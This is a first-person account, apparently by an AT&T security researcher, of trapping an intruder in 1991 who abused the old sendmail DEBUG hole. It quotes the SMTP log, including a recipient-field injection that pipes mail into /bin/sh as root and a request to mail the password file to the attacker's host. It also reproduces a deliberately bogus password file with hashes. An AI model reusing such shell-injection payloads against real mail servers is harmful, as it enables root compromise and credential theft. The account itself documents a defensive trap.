I first noticed our volunteer when he made a typical request through an old and deprecated route. He wanted a copy of our password file, presumably for the usual dictionary attack. But he attempted to fetch it using the old sendmail debug hole. (This is not to be confused with new sendmail holes, which are legion.)
The following log, from 15 Jan 1991, showed decidedly unfriendly activity:
19:43:10 smtpd: <--- 220 inet.att.com SMTP 19:43:14 smtpd: -------> debug 19:43:14 smtpd: DEBUG attempt 19:43:14 smtpd: <--- 200 OK 19:43:25 smtpd: -------> mail from: 19:43:25 smtpd: <--- 503 Expecting HELO 19:43:34 smtpd: -------> helo 19:43:34 smtpd: HELO from 19:43:34 smtpd: <--- 250 inet.att.com 19:43:42 smtpd: -------> mail from: 19:43:42 smtpd: <--- 250 OK 19:43:59 smtpd: -------> rcpt to: rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0"> 19:44:44 smtpd: shell characters: |sed -e '1,/^$/'d | /bin/sh ; exit 0" 19:44:45 smtpd: <--- 250 OK 19:44:48 smtpd: -------> data 19:44:48 smtpd: <--- 354 Start mail input; end with. 19:45:04 smtpd: <--- 250 OK 19:45:04 smtpd: /dev/null sent 48 bytes to upas.security 19:45:08 smtpd: -------> quit 19:45:08 smtpd: <--- 221 inet.att.com Terminating 19:45:08 smtpd: finished.
This is our log of an SMTP session, which is usually carried out between two mailers. In this case, there was a human at the other end typing (and mistyping) commands to our mail daemon. The first thing he tried was the DEBUG command. He must have been surprised when he got the "250 OK" response. (The implementation of this trap required a few lines of code in our mailer. This code has made it to the Unix System-V Release-4 mailer. The key line is the rcpt-to: command entered at 19:44:44. The text within the angled brackets of this command is usually the address of a mail recipient. Here it contains a command line. Sendmail used to execute this command line as root when it was in debug mode. In our case, the desired command is mailed to me. The text of the actual mail message (not logged) is piped through
sed -e '1,/^$/'d | /bin/sh ; exit 0"
which strips off the mail headers and executes the rest of the message as root. Here were two of these probes as I logged them, including a time stamp:
19:45 mail adrian@embezzle.stanford.eduHe wanted us to mail him a copy of our password file, presumably to run it through a password cracking program. Each of these probes came from a user adrian on embezzle.stanford.edu. They were overtly hostile, and came within half an hour of the announcement of U.S. air raids on Iraq. I idly wondered if Saddam had hired a cracker or two. I happened to have the spare bogus password file in the FTP directory (shown elsewhere, so I mailed that back with a return address of root. I also sent the usual letter to Stanford informing them of the presence of a hacker.
The next morning I heard from Stephen Hansen, an administrator at Stanford. He was up to his ears in hacker problems.
The adrian account had been stolen, and many machines assaulted. He and Tsutomu Shimomura of Los Alamos Labs were developing wiretapping tools to keep up with this guy. The assaults were coming into a terminal server from a phone connection, and they hoped to trace the phone calls at some point.
The following Sunday morning I received a letter from France:
To: root@research.att.com Subject: intruder Date: Sun, 20 Jan 91 15:02:53 +0100 I have just closed an account on my machine which has been broken by an intruder coming from embezzle.stanford.edu. He (she) has left a file called passwd. The contents are: ------------ >From root@research.att.com Tue Jan 15 18:49:13 1991 Received: from research.att.com by embezzle.Stanford.EDU Tue, 15 Jan 91 18:49:12 -0800 Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU> From: root@research.att.com Date: Tue, 15 Jan 91 21:48 EST To: adrian@embezzle.stanford.edu Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/: Daemon: *:1:1:0000-Admin(0000):/: Bin: *:2:2:0000-Admin(0000):/bin: Sys: *:3:3:0000-Admin(0000):/usr/v9/src: Adm: *:4:4:0000-Admin(0000):/usr/adm: Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp: Nuucp: *:10:10::/usr/spool/uucppublic:/usr/lib/uucp/uucico Ftp: anonymous:71:14:file transfer:/:no soap Ches: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh Dmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh Berferd: deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh Td: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh Status: R ------------ Please let me know if you heard of him.
Our bogus password file had traveled to France! (A configuration error caused our mailer to identify the password text as RFC 822 header lines, and carefully adjusted the format accordingly. The first letter was capitalized, and there was a space added after the first colon on each line.)